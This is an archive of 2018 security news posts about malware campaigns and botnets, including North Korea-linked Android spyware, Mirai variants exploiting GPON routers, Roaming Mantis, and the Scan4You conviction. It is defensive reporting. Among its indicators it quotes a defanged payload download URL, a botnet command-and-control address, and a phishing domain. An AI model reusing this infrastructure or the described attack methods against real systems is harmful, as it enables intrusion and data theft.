Category Archives: Malware

North Korea-linked Sun Team APT group targets deflectors with Android Malware

A North Korea-linked APT group tracked as Sun Team has targeted North Korean deflectors with a malicious app that was published in the official Google Play store.

A North Korea-linked APT group tracked as Sun Team has targeted North Korean deflectors with a malicious app that was published in the official Google Play store.

The campaign, named RedDawn by security experts at McAfee, is the second campaign attributed conducted by the same APT group this year.

Experts noticed that this is the first time the APT abused the legitimate Google Play Store as the distribution channel. In a past campaign spotted in January, a group of North Korean deflectors and journalists was targeted via social networks, email, and chat apps.

Researchers at McAfee discovered that the malware was on Google Play as ‘unreleased’ versions and it accounts for only around 100 infections, they also notified it to Google that has already removed the threat from the store.

Once installed, the malware starts copying sensitive information from the device, including personal photos, contacts, and SMS messages, and then sends them to the threat actors.

McAfee found that the hackers managed to upload three applications to Google Play – based on the email accounts and Android devices used in the previous attack. The apps include Food Ingredients Info, Fast AppLock, and AppLockFree. They stayed in Google Play for about 2 months before being removed.

“Our recent discovery of the campaign we have named RedDawn on Google Play just a few weeks after the release of our report proves that targeted attacks on mobile devices are here to stay.” reads the post published by the security firm.

“We found three apps uploaded by the actor we named Sun Team, based on email accounts and Android devices used in the previous attack.”

The experts discovered three apps in the app store, the first one named 음식궁합 (Food Ingredients Info), provides information about food, the remaining apps, Fast AppLock and AppLockFree, are security applications.

While the 음식궁합 and Fast AppLock apps are data stealer malware that receives commands and additional executable (.dex) files from a cloud control server, the  AppLockFree is a reconnaissance malware that prepares the installations to further payloads.

The malware spread to friends, asking them to install the malicious apps and offer feedback via a Facebook account with a fake profile promoted 음식궁합.

“After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks.” continues the report.  “From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January,”

The logs collected by the malicious apps appear similar to other logs associated with the Sun Team APT group, in an apparently poor opsec the attackers used email addresses for malware’ developers associated with the North Korea group.

Sun Team malware-campaign

Of course, we cannot exclude that this is an intentional false flag to make hard the attribution of the attack.

The malware used in this campaign has been active at least since 2017, researchers observed numerous versions of the same code.

Threat actors are not native South Korean, but familiar with the culture and language.

“In the new malware on Google Play, we again see that the Korean writing in the description is awkward. As in the previous operation, the Dropbox account name follows a similar pattern of using names of celebrities, such as Jack Black, who appeared on Korean TV.” continues the analysis published by McAfee,

“These features are strong evidence that the actors behind these campaigns are not native South Koreans but are familiar with the culture and language. These elements are suggestive though not a confirmation of the nationality of the actors behind these malware campaigns.”

The attackers tested their malware in with mobile devices from several while the exploit code found in a cloud storage revealed modified “versions of publicly available sandbox escape, privilege escalation, code execution exploits.”

Some of the exploits were modified by the attackers, but experts believe that developers are currently not skillful enough to develop their own zero-day exploits,

The Sun Team hackers were observed creating fake accounts using photos from social networks and the identities of South Koreans. In addition to stealing identities, the hackers are using texting and calling services to generate virtual phone numbers that allow them to sign up for online services in South Korea.

Pierluigi Paganini

(Security Affairs – Sun Team APT, malware)

The post North Korea-linked Sun Team APT group targets deflectors with Android Malware appeared first on Security Affairs.

Fighting ransomware with network segmentation as a path to resiliency

Recent cybersecurity events involving the use of ransomware (WannaCry and similar variants) represent the latest examples highlighting the need for organizations to not only take an initial hit, but survive, adapt, and endure. In other words, be resilient. All too often, our community is a witness to any number of similar events where an initial breach leads to catastrophic effects across the enterprise. We need to do better; the methodologies and tools to do so … More

The post Fighting ransomware with network segmentation as a path to resiliency appeared first on Help Net Security.

TheMoon botnet is now leveraging a zero-day to target GPON routers

Security experts from Qihoo 360 Netlab discovered the operators behind the TheMoon botnet are now leveraging a zero-day exploit to target GPON routers.

Researchers from security firm Qihoo 360 Netlab reported that cybercriminals are continuing to target the Dasan GPON routers, they recently spotted threat actors using another new zero-day flaw affecting the same routers and recruit them in their botnet.

At the time of writing, there aren’t further details on the vulnerabilities exploited by attackers in the wild, Qihoo 360 Netlab experts only confirmed that the exploit code they tested worked on two models of GPON routers.

The security firm has refused to release further details on this flaw to prevent more attacks but said it was able to reproduce its effects.

Experts discovered the operators behind the TheMoon botnet are now leveraging the zero-day exploit to target GPON routers. The activity of the TheMoon botnet was first spotted in 2014, and since 2017 its operators added to the code of the bot at least 6 IoT device exploits.

“A very special thing about this round is the attacking payload. It is different from all previous ones, so it looks like a 0day.” reads the analysis published by Netlab.

“And we tested this payload on two different versions of GPON home router, all work. All these make TheMoon totally different, and we chose NOT to disclose the attack payload details.”

GPON routers

TheMoon isn’t only the last botnet targeting Dasan GPON routers, in a previous analysis shared by Netlab, the experts confirmed that Hajime, Mettle, Mirai, Muhstik, and Satori botnets have been exploiting the CVE-2018-10561 and CVE-2018-10562 exploits for the same models.

Netlab along with other security firms have managed to take down the C&C servers of the Muhstik botnet.

Despite a large number of GPON routers is exposed online only 240,000 have been compromised, likely because the exploit code used by the attackers was not able to properly infect the devices.

Experts warn that the number of infected GPON routers could rapidly increase if the zero-day vulnerability will be exploited by other threat actors.

Pierluigi Paganini

(Security Affairs – GPON routers, botnet)

The post TheMoon botnet is now leveraging a zero-day to target GPON routers appeared first on Security Affairs.

Roaming Mantis gang evolves and broadens its operations

Roaming Mantis malware initially targeting Android devices, now has broadened both its geographic range and its targets.

Security experts from Kaspersky Lab discovered that the operators behind the Roaming Mantis campaign continue to improve their malware broadening their targets, their geographic range and their functional scope.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The dreaded DNS hijacking malware was originally designed to steal users’ login credentials and the secret code for two-factor authentication from Android devices, it has evolved and recently was spotted targeting iOS devices as well as desktop users.

“In April 2018, Kaspersky Lab published a blog post titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices.” reads the analysis published by Kaspersky.

“In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.”

Operators behind the Roaming Mantis malware recently added the support for 27 languages to broaden their operations.

The versions of the Roaming Mantis malware continue to be spread via DNS hijacking, attackers used rogue websites to serve fake apps infected with banking malware to Android users, phishing sites to iOS users, and redirect users to websites hosting cryptocurrency mining script.

To evade detection, malicious websites used in the campaign generate new packages in real time.

“Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018.It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes.” continues the analysis.

“This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.”

According to Kaspersky, the recent malicious apk now implements 19 backdoor commands, including the new one “ping” and sendSms, setWifi, gcont, lock, onRecordAction, call, get_apps,

Owners of iOS devices are redirected to a phishing site (http://security[.]apple[.]com/) that mimics the Apple website in the attempt of stealing user credentials and financial data (user ID, password, card number, card expiration date and CVV number).

Roaming Mantis

The Roaming Mantis operators have recently started targeting PC platforms, users are redirected to websites running the Coinhive web miner scripts.

The level of sophistication of the operations conducted by the Roaming Mantis gang and the rapid growth of the campaign lead the researchers into believing that the group has a strong financial motivation and is well-funded.

“The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.” concludes Kaspersky.
“The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.”

Further details, including IoCs are available in the report published by Kaspersky.

Pierluigi Paganini

(Security Affairs – Roaming Mantis, cybercrime)

The post Roaming Mantis gang evolves and broadens its operations appeared first on Security Affairs.

Vega Stealer Malware Swoops Financial Data Straight from Chrome and Firefox Browsers

Many internet users today store financial and personal data within a browser so that it auto-populates anytime they encounter a fill form. That way, they can save themselves the time they would normally spend typing their information into a website when wishing to make a purchase or take an action online. It’s convenient and easy, but also a security risk. This especially the case due to the emergence of Vega Stealer, a malware strain aiming to capitalize on that very short cut, and is designed to harvest saved financial data from Google Chrome and Firefox browsers.

Vega Stealer makes its way through the web through a common cybercriminal tactic – phishing emails. Once it spreads via these nasty notes, Vega swoops personal information that has been saved in Google Chrome, including passwords, saved credit cards, profiles, and cookies. Mind you, Firefox also has a target on its back, as the malware harvests specific files that store various passwords and keys when Firefox in use. But Vega Stealer doesn’t stop there, it also takes a screenshot of the infected machine and scans for any files on the system ending in .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf.

As of now, it has not been determined who exactly is behind these browser attacks (though the strain seems to be related to August Stealer malware), but we do know one thing for sure:  Vega is quite the thief. The good news is – there are many ways you can protect yourself from the nasty malware strain. Start by following these tips:

  • Change your passwords. With Vega Stealer eager for credentials, the first thing you should do is change up your existing login information to any accounts you access using Chrome or Firefox. And, of course, make sure your new passwords are strong and complex.
  • Be on the lookout for phishing scams.If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided. Better to just delete the email entirely.
  • Stop Autofill on Chrome. This malware is counting on the fact that you store financial data within your browser. To stop it in its tracks, head to your Google Chrome account and go to settings. Scroll down to “Passwords and Forms,” go to “Autofill Settings,” and make sure you remove all personal and financial information from your Google Chrome Autofill. Though this means you’ll have to type out this information each time you want to make a purchase, your personal data will be better protected because of it.
  • Stay protected while you browse. With Vega Stealer attacking both Chrome and Firefox browsers, it’s important to put the right security solutions in place in order to surf the web safely. Add an extra layer of security to your browser with McAfee WebAdvisor.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Vega Stealer Malware Swoops Financial Data Straight from Chrome and Firefox Browsers appeared first on McAfee Blogs.

Fortnite is coming to Android, but malicious fake apps are already there

Android users eager to play the increasingly popular Fortnite survival game on their mobile devices are being targeted left and right with malicious apps masquerading as the game or apps related to it. What is Fortnite? Fortnite is a co-op sandbox survival game published by Epic Games. It was released for Microsoft Windows, macOS, PlayStation 4, and Xbox One in July 2017 and, more recently, for iOS. Its popularity is steadily rising and Epic has … More

The post Fortnite is coming to Android, but malicious fake apps are already there appeared first on Help Net Security.

Judges convict crook of operating Scan4You Counter Antivirus Service

Crook faces up to 35 years in prison for operating the popular Scan4You counter anti-virus (CAV) website that helped malware authors to test the evasion capabilities of their codes.

Scan4You is a familiar service for malware developers that used it as a counter anti-virus (CAV).

Scan4You allowed vxers to check their malware against as many as 40 antivirus solutions.

scan4you

Scan4You was probably the largest counter anti-virus website, it went offline in May 2017 after authorities arrested two men in Latvia, the Russian national Jurijs Martisevs (36) (aka “Garrik”) and Ruslans Bondars (37) (aka “Borland”).

Both suspects were extradited by the FBI to the United States.

Jurijs Martisevs was traveling to Latvia when he was arrested by authorities and in March he pleaded guilty in a Virginia court to charges of conspiracy and aiding and abetting computer intrusion.

On Wednesday, Bondars was found guilty of conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage.

“Ruslans Bondars helped hackers test and improve the malware they then used to inflict hundreds of millions of dollars in losses on American companies and consumers,” said John P. Cronan, Acting Assistant Attorney General of the Justice Department’s Criminal Division

“Today’s verdict should serve as a warning to those who aid and abet criminal hackers: the Criminal Division and our law enforcement partners consider you to be just as culpable as the hackers whose crimes you enable—and we will work tirelessly to identify you, prosecute you, and seek stiff sentences that reflect the seriousness of your crimes.”

Bondars faces a maximum penalty of 35 years in prison when sentenced on September 21, 2018.

Scan4You was launched in 2009 with the intent to offer a service that helped malware developers to check evasion capabilities of their code.

For a monthly fee, malware authors could upload their samples to the service that test their evasion capabilities against a broad range of anti-virus products.

The service is similar to the legitimate VirusTotal with the difference that Scan4You did not share submissions with the security community.

“Scan4you differed from legitimate antivirus scanning services in multiple ways. For example, while legitimate scanning services share data about uploaded files with the antivirus community and notify their users that they will do so, Scan4you instead informed its users that they could upload files anonymously and promised not to share information about the uploaded files with the antivirus community.” continues the DoJ.

According to the DoJ, crooks used Scan4You’s services to test the infamous Citadel malware that was used in the cyber attack against the retail giant Target.

Even if Scan4You was taken offline, crooks have other ways to test their malware before spreading them in the wild. Law enforcement must remain vigilant to prevent the growth of other similar services.

Pierluigi Paganini

(Security Affairs – CAV, Scan4You)

The post Judges convict crook of operating Scan4You Counter Antivirus Service appeared first on Security Affairs.

Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software

While a new variant of the dreaded Mirai botnet, so-called Wicked Mirai, emerged in the wild the operators of the Mirai Satori botnet appear very active.

Experts observed hackers using the Satori botnet to mass-scan the Internet for exposed Ethereum mining pools, they are scanning for devices with port 3333 exposed online.

The port 3333 is a port commonly used for remote management by a large number of cryptocurrency-mining equipment.

The activities were reported by several research teams, including Qihoo 360 Netlab, SANS ISC,  and GreyNoise Intelligence.

Starting from May 11, experts are observing the spike in activity of the Satori botnet.
satori botnet activity

According to the researchers at GreyNoise, threat actors are focused on equipment running the Claymore mining software, once the attackers have found a server running this software they will push instructions to force the device to join the ‘dwarfpool’ mining pool using the ETH wallet controlled by the attackers.

The experts noticed that most of the devices involved in the mass scanning are compromised GPON routers located in Mexico.

The experts monitored five botnets using the compromised GPON routers to scan for Claymore miners, one of them is the Satori botnet that is leveraging an exploit for the attack.

Below the details of the five botnets published by Netlab 360:

  • SatoriSatori is the infamous variant of the mirai botnet.
    • We first observed this botnet coming after the GPON vulnerable devices at 2018-05-10 05:51:18, several hours before our last publish.
    • It has quickly overtakes muhstik as the No.1 player.
  • Mettle: A malicious campaign based on IP addresses in Vietnam (C2 210.245.26.180:4441, scanner 118.70.80.143) and mettle open source control module
  • HajimeHajime pushed an update which adds the GPON’s exploits
  • Two Mirai variants: At least two malicious branches are actively exploiting this vulnerability to propagate mirai variants. One of them has been called omni by newskysecurity team.
  • imgay: This appears like a botnet that is under development. Its function is not finished yet.

“In our previous article, we mentioned since this GPON Vulnerability (CVE-2018-10561, CVE-2018-10562 ) announced, there have been at least five botnets family mettle, muhstik, mirai, hajime, satori actively exploit the vulnerability to build their zombie army in just 10 days.” reads a blog post published by Netlab 360.

“From our estimate, only 2% all GPON home router is affected, most of which located in Mexico.”

“The source of this scan is about 17k independent IP addresses, mainly from Uninet SA de CV, telmex.com, located in Mexico,”

Researchers at SANS ISC that analyzed the Satori botnet activity discovered the bot is currently exploiting the CVE-2018-1000049 remote code execution flaw that affects the Nanopool Claymore Dual Miner software.

The experts observed the availability online of proof-of-concept code for the CVE-2018-1000049 vulnerability.

“The scan is consistent with a vulnerability, CVE 2018-1000049, released in February [2]. The JSON RPC remote management API does provide a function to upload “reboot.bat”, a script that can then be executed remotely. The attacker can upload and execute an arbitrary command using this feature.” reads the analysis published by the SANS ISC.

“The port the API is listening on is specified when starting the miner, but it defaults to 3333. The feature allows for a “read-only” mode by specifying a negative port, which disables the most dangerous features. There doesn’t appear to be an option to require authentication.”

Pierluigi Paganini

(Security Affairs – Satori Botnet, hacking)

The post Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software appeared first on Security Affairs.

Malware Actors Targeting North Korean Defectors Using Facebook and Google Play

Security researchers found that hackers are using both Google Play and Facebook to actively target North Korean defectors with malware capable of stealing their information. McAfee Mobile Research Team discovered that the Sun Team hacking group is using Facebook to share links with North Korean defectors. At the time of analysis, these URLs directed targets […]… Read More

The post Malware Actors Targeting North Korean Defectors Using Facebook and Google Play appeared first on The State of Security.

Security Affairs: The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.

The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including SatoriMasuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.



Security Affairs

Updated – The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’, it includes new exploits and spread a new bot.

The name Wicked Mirai comes from the strings in the code, the experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”

Wicked Mirai

The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie, at the time it was used to power massive DDoS attacks in the wild. The Mirai’s source code was leaked online in October 2016, since then many other variants emerged in the wild, including SatoriMasuta, and Okiru.

According to Fortinet, the author of the Wicked Mirai is the same as the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module that is responsible for the propagation of the malware.

The original Mirai leveraged brute force attempts to compromise other IOT devices, while the WICKED Mirai uses known exploits.

The Wicked Mirai would scan ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot will attempt to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit to be used depends on the specific port the bot was able to connect to. Below the list of devices targeted by the Wicked Mirai

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation allowed the researchers to contradict this hypothesis and confirmed the bot would actually connect to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.

Wicked Mirai 2.png

Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with Owari/Sora IoT Botnet author dated back to April.

The vxer, who goes by the online handle of “Wicked,” that at the time said he abandoned the Sora botnet and was working on Owari one.

The conversation suggests the author abandoned both Sora and Owari bots and he is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Update May 19, 2018 – Spaeaking with MalwareMustDie

I have contacted Malware Must Die for a comment on the Wicked Mirai botnet.

Below the observations he shared with me:

  • Same coder.
  • The author put all of the high-possibility exploit code in Mirai
  • GPON was seemed used on separate pwn scheme by different script outside of the Mirai, but being used to infect Mirai.

MalwareMustDie researchers told me that they passed the identity of the author to the related country LEA. They explained to me that even if they made several reports to the authorities, law enforcement failed in preventing the diffusion of the malicious code. The experts showed me official report to LEA dated back January 2018, when they alerted authorities of propagations of new Mirai variants.

“the ID of the actor was passed to the related country LEA from our team that investigated result too since we published the Satori/Okiru variant a while ago, way before ARC CPU variant was spotted.” MMD told me.

“So by the release of the OWARI, SORA, and WICKED, this is what will happen if we let the malware actor running loose unarrested. More damage will be created and they just don’t know how to stop them self.”

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post Updated – The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.

Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market

Data from the first quarter of 2018 revealed that the cybersecurity threats landscape is changing. As noted by CSO Online, cryptojacking continues to gain ground: In the first quarter of 2018, 28 percent of companies reported crypto-mining malware, up from just 13 percent in Q4 2017.

According to Nasdaq, meanwhile, ransomware remains a critical threat. BlackRuby, SamSam and GandCrab all made an impact over the last three months, with GandCrab’s ransom demand marking the first time malicious actors asked for payment in Dash digital currency.

But there’s another story here: The growing division (and multiplication) of the zero-day market.

The Attack Surface Expands

As Computer Weekly reported, the total number of malware families grew by 25 percent last quarter while unique variants saw a 19 percent boost. In addition, cybercriminals are now taking the time to conduct reconnaissance on potential targets and leverage automation to maximize attack impact. The Nasdaq piece pointed to the Olympic Destroyer malware, which was specifically designed to interfere with the global sporting event in Pyeongchang this year.

Corporate attack surfaces are also expanding thanks to the uptake of Internet of Things (IoT) technologies. Three of the top 20 reported cybersecurity threats last quarter targeted these devices. Although 60 percent of all web traffic is now encrypted, this “represents a real challenge for traditional security technology that has no way of filtering encrypted traffic.” So it’s no surprise that zero-day threats haven’t received as much attention, even as the market for discovery and distribution evolves.

No Zero-Sum Game

According to Fortinet’s “Threat Landscape Report Q1 2018,” the zero-day market is maturing. While there were 214 zero-day threats discovered in all of 2017, 45 were found in Q1 2018 alone, affecting everything from popular content management systems (CMSs) to device makers and industry-leading operating system (OS) developers. Division of the market by “hat” — white-, gray- and black-hat IT experts — has produced three distinct zero-day streams:

  • White hat — This market supports bug bounty programs, which pay law-abiding security professionals to find new vulnerabilities, but secure disclosure and patching of these exploits is critical to limit accidental exposure.
  • Grey hatHere, zero-day “brokers” purchase bugs for customers. The caveat is that these customers are typically anonymous. The Fortinet report noted that it’s “possible that the buyer is a hostile nation-state, cybercriminal enterprise or otherwise maliciously inclined.”
  • Black hatFor black-hat actors, the goal is to both find and create new zero-day exploits for profit, and threat researchers have confirmed that “the creation and distribution of zero days by cybercriminals is on the rise.”

This triple-threat market adds up to a kind of multiplicative effect: Companies concerned about zero-day bugs invest more money into white-hat programs to find and eliminate them, while for-profit gray- and black-hat actors look to discover and create new bugs to continue the cycle.

Transformative Cybersecurity Threats

The Fortinet report emphasized that the rise of malware innovation, IoT risks, cryptojacking and zero-day threats “points to the continued transformation of cybercrime.” Specifically, companies need to do the math on zero-day exploits — division of outcomes, combined with multiplying interest, makes this a market to watch in 2018.

The post Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market appeared first on Security Intelligence.

Malware on Google Play Targets North Korean Defectors

Earlier this year, McAfee researchers predicted in the McAfee Mobile Threat Report that we expect the number of targeted attacks on mobile devices to increase due to their ubiquitous growth combined with the sophisticated tactics used by malware authors. Last year we posted the first public blog about the Lazarus group operating in the mobile landscape. Our recent discovery of the campaign we have named RedDawn on Google Play just a few weeks after the release of our report proves that targeted attacks on mobile devices are here to stay.

RedDawn is the second campaign we have seen this year from the “Sun Team” hacking group. In January, the McAfee Mobile Research Team wrote about Android malware targeting North Korean defectors and journalists. McAfee researchers recently found new malware developed by the same actors that was uploaded on Google Play as “unreleased” versions. We notified both Google, which has removed the malware from Google Play, and the Korea Internet & Security Agency.

Our findings indicate that the Sun Team is still actively trying to implant spyware on Korean victims’ devices. (The number of North Korean defectors who came to South Korea exceeded 30,000 in 2016, according to Radio Free Asia.) Once the malware is installed, it copies sensitive information including personal photos, contacts, and SMS messages and sends them to the threat actors. We have seen no public reports of infections. We identified these malwares at an early stage; the number of infections is quite low compared with previous campaigns, about 100 infections from Google Play.

Malware on Google Play

Malware uploaded on Google Play (now deleted).

We found three apps uploaded by the actor we named Sun Team, based on email accounts and Android devices used in the previous attack. The first app in this attack, 음식궁합 (Food Ingredients Info), offers information about food; the other two apps, Fast AppLock and AppLockFree, are security related. 음식궁합 and Fast AppLock secretly steal device information and receive commands and additional executable (.dex) files from a cloud control server. We believe that these apps are multi-staged, with several components. AppLockFree is part of the reconnaissance stage we believe, setting the foundation for the next stage unlike the other two apps. The malwares were spread to friends, asking them to install the apps and offer feedback via a Facebook account with a fake profile promoted 음식궁합.

Links to Previous Operations

After infecting a device, the malware uses Dropbox and Yandex to upload data and issue commands, including additional plug-in dex files; this is a similar tactic to earlier Sun Team attacks. From these cloud storage sites, we found information logs from the same test Android devices that Sun Team used for the malware campaign we reported in January. The logs had a similar format and used the same abbreviations for fields as in other Sun Team logs. Further, the email addresses of the new malware’s developer are identical to the earlier email addresses associated with the Sun Team. The relationship among email addresses and test devices is explained in the following diagram.

The use of identical email addresses ties the two malware campaigns to the same attacker.

About the Actors

After tracking Sun Team’s operations, we were able to uncover different versions of their malware. Following diagram shows the timeline of the versions.

Timeline of different malware versions of Sun Team.

Timeline shows us that malwares became active in 2017. Sun Team’s only purpose is to extract information from devices as all of the malwares are spywares. Malwares on Google Play stayed online for about 2 months before being deleted.

In our post of the earlier attack by this actor, we observed that some of the Korean words found on the malware’s control server are not in South Korean vocabulary and that an exposed IP address points to North Korea. Also, Dropbox accounts were names from South Korean drama or celebrities.

In the new malware on Google Play, we again see that the Korean writing in the description is awkward. As in the previous operation, the Dropbox account name follows a similar pattern of using names of celebrities, such as Jack Black, who appeared on Korean TV. These features are strong evidence that the actors behind these campaigns are not native South Koreans but are familiar with the culture and language. These elements are suggestive though not a confirmation of the nationality of the actors behind these malware campaigns.

Sun Team’s test devices originate from various countries.

Moreover, we uncovered information about the attacker’s Android test devices and exploits they tried to use. The devices are manufactured in several countries and carry installed Korean apps, another clue that the threat actors can read Korean. The exploits codes were found uploaded on one of the cloud storages used by Sun Team which are modified versions of publicly available sandbox escape, privilege escalation, code execution exploits that added functions to drop their own Trojans on victims’ devices. The modified exploits suggest that the attackers are not skillful enough to find zero days and write their own exploits. However, it is likely just a matter of time before they start to exploit vulnerabilities.

Modified exploits installing the Sun Team’s Trojan.

The most concerning thing about this Sun Team operation is that they use photos uploaded on social network services and identities of South Koreans to create fake accounts. We have found evidence that some people have had their identities stolen; more could follow. They are using texting and calling services to generate virtual phone numbers so they can sign up for South Korean online services.

Conclusion

This malware campaign used Facebook to distribute links to malicious apps that were labeled as unreleased versions. From our analysis, we conclude that the actor behind both campaigns is Sun Team. Be cautious when installing unreleased or beta versions of any app. Also, check the number of downloads to see if an app is widely installed; avoid obscure apps.

McAfee Mobile Security detects this malware as Android/RedDawn.A, B. Always keep your mobile security application updated to the latest version.

The post Malware on Google Play Targets North Korean Defectors appeared first on McAfee Blogs.

Federal Jury Convicts Operator of “Scan4You” Counter Antivirus Service

A federal jury convicted one of the digital criminals responsible for operating the notorious “Scan4You” counter antivirus (CAV) service. On 16 May, the Department of Justice released a press release announcing a Virginia federal jury’s conviction of Ruslans Bondars, 37, on one count of conspiracy to commit wire fraud, one count of conspiracy to violate […]… Read More

The post Federal Jury Convicts Operator of “Scan4You” Counter Antivirus Service appeared first on The State of Security.

Security Affairs: Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files

Cisco Talos researchers have spotted a new variant of Telegrab malware designed to collect information from the Desktop version of the popular messaging service Telegram.

Security experts from Cisco Talos group have spotted a new strain of malware that is targeting the desktop version of end-to-end encrypted instant messaging service Telegram.

We all know that Telegram is under attack by Russia’s Media watchdog Roskomnadzor that asked the company to share technical details to access electronic messages shared through the instant messaging app. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over encryption keys of its users to Federal Security Service (FSB) of Russia for investigation purposes.

